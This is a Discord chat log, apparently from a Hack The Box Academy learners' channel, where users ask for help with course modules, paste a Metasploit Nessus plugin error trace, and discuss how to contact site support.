If anyone on information gathering module done or still going on it let's do it together I think that would be interesting

honest ridge
#

@fathom pendant thanks. got it. the question/section really didnt mention anything...... but got answer so meh..

cloud skiff
#

Does anyone have a solution for this Nessus issue?
Issue -->```[-] Error while running command nessus_scan_new: undefined method `[]' for nil:NilClass

Call stack:
/usr/share/metasploit-framework/plugins/nessus.rb:994:in cmd_nessus_scan_new' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:581:in run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:530:in block in run_single' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in run_single' /usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:168:in run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in start' /usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in start'
/usr/bin/msfconsole:23:in `<main>'

fathom pendant
honest ridge
#

@fathom pendant kk

sage storm
#

@novel matrix Hey!

#

I needed some help

#

setting up my HTB acc

novel matrix
hazy grotto
#

Anyone done the File upload attacks/ Limited File uploads section?

I'm on the first question. I'm uploading a file but i don't see any source info. I feel i'm missing a step.

twilit scaffold
#

hey i'm learning Navigation section in Linux Fundamental modules, but is this suppose to be the right answer?

slow raptor
#

Anyone with password cracking module

thorn ingot
#

Is it possible to reset the progress on the modules?

hollow dagger
grand bane
grand bane
modest isle
#

Anyone to help?

ivory bough
#

you have to contact the support team again. You can probably ping the admin here in discord and talk about it

autumn pilot
#

the admins in discord have nothing to do with the websites

modest isle
#

Do the admins here in Discord have a connect to HTB support?

autumn pilot
#

why would they?

modest isle
#

I thought as much

#

How do I ping them from discord?

autumn pilot
#

hackthebox support can only be reached through the websites

#

on top of that why would one try to change his current email to one that he doesn't have access to?

#

where is the logic

modest isle